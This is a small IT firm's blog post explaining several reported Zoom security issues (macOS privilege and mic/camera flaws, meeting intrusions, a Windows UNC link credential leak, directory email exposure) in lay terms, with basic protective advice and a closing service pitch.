Wouldn’t you know it. Just as everyone piles on the Zoom wagon, there are vulnerabilities discovered. This always happens when software gets wide acceptance, as Bad Guys(TM) seek to capitalize on the popularity for technical or financial purposes. Usually it is to provide platforms for advertisements, which pay. Briefly, that is the motivation. So, why Zoom? What is so special about it?
Nothing. The flies are drawn to it because a lot of people are using it.
What are the threats? Not much more than you clicking a bad link any other way. Let’s take a look at the recent news:
- Threatpost puts out an article about 2 vulnerabilities here, The 2 vulnerabilities are for Apple/Mac Zoom clients, summed up in the article thus:
The vulnerabilities come with the caveat that an attacker needs a local foothold on systems to exploit them – so bad actors would first need physical access to a victims’ computer. Another attack scenario could include a post-malware infection attack by a remote adversary with a preexisting foothold on the targeted system.
The [way into the system] has actually been deprecated [meaning old, unused] by Apple because the it does not attempt to validate a binary being executed at root.
The second zero day flaw gives attackers Zoom’s mic and camera access, allowing for a way to record Zoom meetings, or snoop in on victims’ personal lives – sans a user access prompt.
Zoom requires access to a system microphone and camera due to its nature of being a web conferencing platform. While recent versions of macOS require explicit user approval for these permissions, Zoom has an “exception” that allows code to be injected by third party libraries.
So you are vulnerable to these if you run a Mac (a bad idea in a business environment) and you are prone to clicking on links without checking. While the above vulnerabilities are about Apple, the next stipulation that puts you at risk concerns any platform:
Moreover, you are at risk if you run normally as a ‘privileged user’, meaning one that can do risky actions like installing software without being asked for a password.
You should always run on your computer as an unprivileged, “normal”, non-root, non-Administrator. Period. This way, if you click on a bad link, or accidentally try to do something unintentional, the system will not allow a ‘normal’ user to do so without FIRST asking for the user/password of a user who has those privileges. Anyone who has worked with me now has their business accounts set up this way.
This is simply someone uninvited joining your meeting.
There are simple guidelines to avoid this, like never posting joining/meeting info publicly, as well as using the more complex URL for your meeting. If you go to settings, you are able to choose whether your invites go out with a nice 10-digit ID, or a really long one of seemingly random characters.
This is really only necessary if you are doing the ‘don’t dos’ above, like publicly posting meeting details. If it is a private meeting, even if large, keep it private. See the Zoom.us site for more tips, as well as this nice article on Techcrunch.
3. Windows Zoom clients converting links to UNC
This is harder to put in lay terms, but let me summarize:
On Tuesday, security researchers uncovered a Universal Naming Convention (UNC) path injection vulnerability in the Zoom Windows client, which could enable attackers to steal Windows credentials of users. The flaw was first discovered by a Twitter user under the handle _g0dmode, and then verified by security researcher Matthew Hickey, with cybersecurity firm Hacker House.
In chat messages on its platform, Zoom automatically converts UNC paths into clickable links. A UNC path is a PC format for specifying the location of resources on a local-area network (LAN), which can be used to access network resources.
Once a victim in the chat clicks on the linked UNC path, Windows will attempt to connect to the link using an SMB file sharing protocol, according to a report by Bleeping Computer. By default, this transmits the victim’s login name and password.
So again, clicking on links that go to places you don’t know, or clicking anything in a public forum, is a bad idea. Oddly enough, this isn’t actually a Zoom “problem”, but rather the way Windows works. This is how you can go back into your server shares on another computer without passing credentials-it uses the ones you already used to log in.
4. It was announced that your “directory” contacts could be “leaked”.
Because this is a colab/sharing platform, when Zoom comes across others in your organization (same domain name as described below), it will by default add them to your “directory” of users.
A separate Zoom issue, reported Wednesday by Motherboard, shows that Zoom is leaking the email addresses and photos of thousands of users. This is due to an issue in Zoom’s “Company Directory,” where the platform automatically adds people to other’s lists of contacts if they use an email address sharing the same domain.
“By default, your Zoom contacts directory contains internal users in the same organization, who are either on the same account or who’s email address uses the same domain as yours (except for publicly used domains including gmail.com, yahoo.com, hotmail.com, etc) in the Company Directory section,” according to Zoom’s support page.
You can manage this directory in the app, change the settings above, and see them whenever you click “invite” from inside a meeting. I never use this feature, preferring instead to use my email client. Some might see this as a great feature (like when you see all your company users in Outlook), some might not. To each their own, but at least Zoom allows you to choose the behavior that suits.
So far, it seems like most all of these vulnerabilities are a concern if normal cyber-security best practices are ignored.
See us at The IT Guys to prepare you and your staff for this or any eventuality by creating Best Practices, Information Security Policies, and Employee Agreements. We provide not just ongoing full-service computing and networking for a flat rate, but all things that prepare your network for compliance and insurance.